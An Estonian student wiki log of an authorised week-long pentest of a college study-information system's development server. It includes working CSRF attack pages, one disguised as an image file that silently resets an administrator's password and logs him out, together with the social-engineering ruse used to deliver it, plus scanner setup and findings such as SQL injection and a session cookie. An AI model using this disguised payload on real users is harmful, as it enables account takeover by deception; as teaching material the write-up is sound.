Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
==== Wapiti ====&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS&#039;iga midagi teha.&lt;br /&gt;
&lt;br /&gt;
==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====&lt;br /&gt;
=====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
=====2. katse - ÕIS&#039;i kasutaja parooli muutmine =====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
Rünnak oli edukas.&lt;br /&gt;
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]&lt;br /&gt;
&lt;br /&gt;
Andsime teada Valterile teada, et tegelikult tegime salajase ründe. &lt;br /&gt;
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha. &lt;br /&gt;
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug&#039;iga.&lt;br /&gt;
&lt;br /&gt;
Kuna tegu oli ÕIS&#039;i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.&lt;br /&gt;
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.&lt;br /&gt;
&lt;br /&gt;
=== Taavi tegevus ===&lt;br /&gt;
===Burp suite===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esimese asjane peale Burp suite käivitamist. Tabilt proxy  -&amp;gt;intercept -&amp;gt;intercept off&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)&amp;lt;br&amp;gt;&lt;br /&gt;
Proxy  -&amp;gt; options alt lülitada sisse proxy listner pordile 8080 .&amp;lt;br&amp;gt;&lt;br /&gt;
Ohvri valimine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida intruder -&amp;gt; target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.&amp;lt;br&amp;gt;&lt;br /&gt;
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.&amp;lt;br&amp;gt;site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.&lt;br /&gt;
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.&amp;lt;br&amp;gt;&lt;br /&gt;
Targer-&amp;gt;scope -&amp;gt; exclude  frome scope ja veenduda at välja on arvatud logout laused.&amp;lt;br&amp;gt;&lt;br /&gt;
Spideringi sisselülitamine &amp;lt;br&amp;gt;&lt;br /&gt;
Valida tab Spide ning sealt panna linnuke kasti spider running.&amp;lt;br&amp;gt;&lt;br /&gt;
Ning oledki valmis saama laheküljelt infot.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.&amp;lt;br&amp;gt;&lt;br /&gt;
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.&lt;br /&gt;
&lt;br /&gt;
==Nessuse algkäivitamine==&lt;br /&gt;
Valida backtrackist  vulnerability scannerite alt nessus ning edasi nessus register .&amp;lt;br&amp;gt; Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.&amp;lt;br&amp;gt; Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)&amp;lt;br&amp;gt;&lt;br /&gt;
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt valida nessus start.&amp;lt;br&amp;gt;&lt;br /&gt;
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834 &lt;br /&gt;
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.&amp;lt;br&amp;gt;&lt;br /&gt;
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.&lt;br /&gt;
&lt;br /&gt;
=== Matise tegevus ===&lt;br /&gt;
==Väike upload tegevus, mis võiks olla teisiti==&lt;br /&gt;
Ajal mil on avatud stipendiumi taotlemine on võimalik uploadida üles dokumente, et anda lisainformatsiooni abitoetuse taotlemiseks.&lt;br /&gt;
Testimisel selgus, et hetkel üles on võimalik üles laadida ükskõik mis laiendiga faile.&lt;br /&gt;
Proovisime üles laadida: &lt;br /&gt;
&amp;lt;li&amp;gt;filmi&lt;br /&gt;
&amp;lt;li&amp;gt;exe &lt;br /&gt;
&amp;lt;li&amp;gt;jpm faile &lt;br /&gt;
&amp;lt;br&amp;gt;kõik läks läbi ja sai uploadida.&lt;br /&gt;
&amp;lt;br&amp;gt;Sellises kohas võiks olla süsteem tehtud &amp;lt;b&amp;gt;whitelisti&amp;lt;/b&amp;gt; põhimõttel,&lt;br /&gt;
&amp;lt;br&amp;gt;et lubatud oleks ainult: &lt;br /&gt;
&amp;lt;li&amp;gt;.doc &lt;br /&gt;
&amp;lt;li&amp;gt;.docx &lt;br /&gt;
&amp;lt;li&amp;gt;.pdf &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Sanderi tegevus ===&lt;br /&gt;
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]&lt;br /&gt;
Backtarcki keskkonnas sai testitud programmi w3af.&lt;br /&gt;
&lt;br /&gt;
==== Backtrack: w3af ====&lt;br /&gt;
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]&lt;br /&gt;
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]&lt;br /&gt;
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]&lt;br /&gt;
Võimalik kätte saada SSL Certificate.&lt;br /&gt;
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:&lt;br /&gt;
  https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?&lt;br /&gt;
  username=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&amp;amp;continue=&amp;amp;Login=Logi sisse&amp;amp;pw=&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
Programmi sisestatud andmetega ka mitte:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Basic HTTP Authentication:&lt;br /&gt;
    basicAuthUser: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;KASUTAJANIMI&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthPass: &amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;PAROOL&amp;lt;/font&amp;gt;&lt;br /&gt;
    basicAuthDomain: http://itcollege.dev.ois.ee&lt;br /&gt;
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:&lt;br /&gt;
  Configuration -&amp;gt; HTTP Config -&amp;gt; Cookies&lt;br /&gt;
    cookieJarFile: /root/Desktop/&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;ois_cookie.txt&amp;lt;/font&amp;gt;&lt;br /&gt;
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:&lt;br /&gt;
  # Netscape HTTP Cookie File&lt;br /&gt;
  .dev.ois.ee	TRUE	/	FALSE	1731510001	itcollege_OIS_SESSION_ID	&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;870aqllryuw3cmf6cv8ellha03&amp;lt;/font&amp;gt;&lt;br /&gt;
Esimene rida on nõutav! Teiste tähendused:&lt;br /&gt;
  domain - The domain that created and that can read the variable.&lt;br /&gt;
  flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.&lt;br /&gt;
    This value is set automatically by the browser, depending on the value you set for domain.&lt;br /&gt;
  path - The path within the domain that the variable is valid for.&lt;br /&gt;
  secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.&lt;br /&gt;
  expiration - The UNIX time that the variable will expire on.&lt;br /&gt;
  name - The name of the variable.&lt;br /&gt;
  value - The value of the variable.&lt;br /&gt;
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:&lt;br /&gt;
  Edit -&amp;gt; Preferences -&amp;gt; Privacy -&amp;gt; History -&amp;gt; remove individual cookies&lt;br /&gt;
    Search: itcollege.dev.ois.ee&lt;br /&gt;
    Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Skänneerimine:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The page language is: en&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; has a &amp;quot;&amp;lt;form&amp;gt;&amp;quot; element with auto-complete enabled.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;A comment with the string &amp;quot;&amp;lt;p&amp;amp;gt;tunne end kui koolis&amp;lt;/p&amp;amp;gt;&amp;quot; was found in: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Found a form login. The action of the form is: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  The username field to be used is: &amp;quot;username&amp;quot;.&lt;br /&gt;
  The password field to be used is: &amp;quot;pw&amp;quot;.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;Found authentication credentials to: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;. A correct user and password combination is: Administrador/6666666&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  Antud kasutaja ja parooliga sisse ei saanud.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; returned a response that may contain a &amp;quot;SHA1&amp;quot; hash. The hash is: &amp;quot;c7b39896de5f296b5a44c2dfcd9f0600b2cf424d&amp;quot;. This is uncommon and requires human verification.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.&lt;br /&gt;
&amp;lt;li&amp;gt;The URL: &amp;quot;https://itcollege.dev.ois.ee/&amp;quot; sent these cookies:&amp;lt;/li&amp;gt;&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/&lt;br /&gt;
  itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/&lt;br /&gt;
&amp;lt;li&amp;gt;The SMTP settings in emailReport plugin seem to be incorrect. Original error: &amp;quot;[Errno 111] Connection refused&amp;quot;.&amp;lt;/li&amp;gt;&lt;br /&gt;
  Kui tuleb see veateade, siis skänn katkeb.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
  The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.&lt;br /&gt;
    It allows the attacker to exchange the method from POST to GET when sending data to the server.&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;font color=&amp;quot;red&amp;quot;&amp;gt;SQL injection in a Unknown database was found at: &amp;quot;https://itcollege.dev.ois.ee/auth/login&amp;quot;, using HTTP method POST.&amp;lt;/font&amp;gt;&amp;lt;/li&amp;gt;&lt;br /&gt;
  The sent post-data was: &amp;quot;username=John8212&amp;amp;security_key_sis_global=d&#039;z&amp;quot;0&amp;amp;Login=Logi%20sisse&amp;amp;continue=56&amp;amp;pw=FrAmE30.&amp;quot;.&lt;br /&gt;
    The modified parameter was &amp;quot;security_key_sis_global&amp;quot;. This vulnerability was found in the request with id 390.&lt;br /&gt;
&amp;lt;li&amp;gt;Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt&amp;lt;/li&amp;gt;&lt;br /&gt;
  User-agent: *&lt;br /&gt;
  Disallow: /&lt;br /&gt;
  Allow: /curriculum&lt;br /&gt;
  Allow: /subject&lt;br /&gt;
  Allow: /diploma&lt;br /&gt;
  Allow: /schedule/ical&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 4. päev - Presentatsiooni tegemine ja esitlemine ==&lt;br /&gt;
&lt;br /&gt;
Koostasime presentatsiooni ja esitlemine.&lt;br /&gt;
&lt;br /&gt;
[[Media:Security_team_presentation.ppt]]&lt;br /&gt;
&lt;br /&gt;
== Arvamused intensiivõppe nädala kohta ==&lt;br /&gt;
&lt;br /&gt;
Sander: Õppisime erinevaid testprogramme ja testkeskkondi kasutama, mida varem kunagi kasutanud polnud. Suutsime avastada nii mõnegi vea, mida varem avastatud ei olnud. Usun, et ÕIS on nüüd kasvõi veidigi turvalisem. Soovitan ka teistele tudengitele intensiivõppenädalal osalemist, kuna valides õige teema võib olla päris huvitav tegeleda millegagi, mida varem teinud pole või mida tegelikult lihtsalt ei ole lubatud teha.&lt;br /&gt;
&lt;br /&gt;
== Tegijad ==&lt;br /&gt;
Alo Konno A21&lt;br /&gt;
&lt;br /&gt;
Urmo Lihten A21&lt;br /&gt;
&lt;br /&gt;
Taavi Podžuks A22&lt;br /&gt;
&lt;br /&gt;
Matis Alliksoo A22&lt;br /&gt;
&lt;br /&gt;
Sander Saarm A22&lt;br /&gt;
&lt;br /&gt;
== Juhendajad ==&lt;br /&gt;
Mart Mangus&lt;br /&gt;
&lt;br /&gt;
Margus Ernits&lt;br /&gt;
&lt;br /&gt;
Valter Kungla&lt;/div&gt;</summary>
		<author><name>Mallikso</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47049</id>
		<title>Security team</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security_team&amp;diff=47049"/>
		<updated>2012-03-30T13:46:56Z</updated>

		<summary type="html">&lt;p&gt;Mallikso: /* 1. päev - Materjalidega tutvumine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== 1. päev - Materjalidega tutvumine ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h1&amp;gt;POOLELI!&amp;lt;/h1&amp;gt;&lt;br /&gt;
&lt;br /&gt;
https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project&lt;br /&gt;
&lt;br /&gt;
    A1: Injection - Urmo&lt;br /&gt;
    A2: Cross-Site Scripting (XSS) - Alo&lt;br /&gt;
    A3: Broken Authentication and Session Management - Sander&lt;br /&gt;
    A4: Insecure Direct Object References - Alo&lt;br /&gt;
    A5: Cross-Site Request Forgery (CSRF) - Taavi&lt;br /&gt;
    A6: Security Misconfiguration - Matis&lt;br /&gt;
    A7: Insecure Cryptographic Storage - Matis&lt;br /&gt;
    A8: Failure to Restrict URL Access - Urmo&lt;br /&gt;
    A9: Insufficient Transport Layer Protection - Taavi&lt;br /&gt;
    A10: Unvalidated Redirects and Forwards - Sander&lt;br /&gt;
&lt;br /&gt;
Sanderi konspekt: [[Media:Ois_materjal.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A9.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Taavi esitlus [[Meida: A5.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Insecure Cryptographic Storage.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Matise esitlus [[Media:Security Misconfiguration.pdf]] &amp;lt;br&amp;gt;&lt;br /&gt;
Alo Esitlus: [[Media:Cross-site_scripting_(XSS).ppt]] &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==&lt;br /&gt;
===Security Team tegevusplaan===&lt;br /&gt;
1.	Päev&lt;br /&gt;
 1.1	Tutvuda OWASP’iga. &lt;br /&gt;
 1.2	Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.&lt;br /&gt;
 1.3	Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.&lt;br /&gt;
2.	Päev&lt;br /&gt;
 2.1	Esitada tiimi tegevusplaan.&lt;br /&gt;
 2.2	Tutvuda turvariskidega natuke põhjalikumalt.&lt;br /&gt;
 2.3	Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.&lt;br /&gt;
 2.4	Täiendada esimese päeva ettekannet.&lt;br /&gt;
3.	Päev&lt;br /&gt;
 3.1	Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.&lt;br /&gt;
 3.2	Saadud tulemuste dokumenteerimine.&lt;br /&gt;
4.	Päev&lt;br /&gt;
 4.1	Saadud tulemuste esitlemine ettekandega&lt;br /&gt;
5.	Päev&lt;br /&gt;
 5.1	Tulemuste parandamine wiki’s.&lt;br /&gt;
&lt;br /&gt;
=== Alo tegevus ===&lt;br /&gt;
&lt;br /&gt;
http://www.acunetix.com/support/vulnerability-checks.htm&lt;br /&gt;
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting&lt;br /&gt;
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting&lt;br /&gt;
http://www.youtube.com/watch?v=SG1cvGQ971g&lt;br /&gt;
http://www.isecom.org/research.html&lt;br /&gt;
http://evuln.com/tools/&lt;br /&gt;
http://sectools.org/tag/web-scanners/&lt;br /&gt;
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/getting-started.htm&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8&lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
Cross-Site Scripting (XSS)&lt;br /&gt;
SQL Injection (blind test)&lt;br /&gt;
File inclusion&lt;br /&gt;
Code Execution&lt;br /&gt;
LDAP Injection&lt;br /&gt;
Cross Frame Scripting&lt;br /&gt;
SQL Injection (error msg. test)&lt;br /&gt;
CRLF Injection&lt;br /&gt;
Directory Travelsal&lt;br /&gt;
XPath Injection&lt;br /&gt;
URL Redirection&lt;br /&gt;
Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.&lt;br /&gt;
&lt;br /&gt;
=== Urmo tegevus ===&lt;br /&gt;
&lt;br /&gt;
Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.&lt;br /&gt;
&lt;br /&gt;
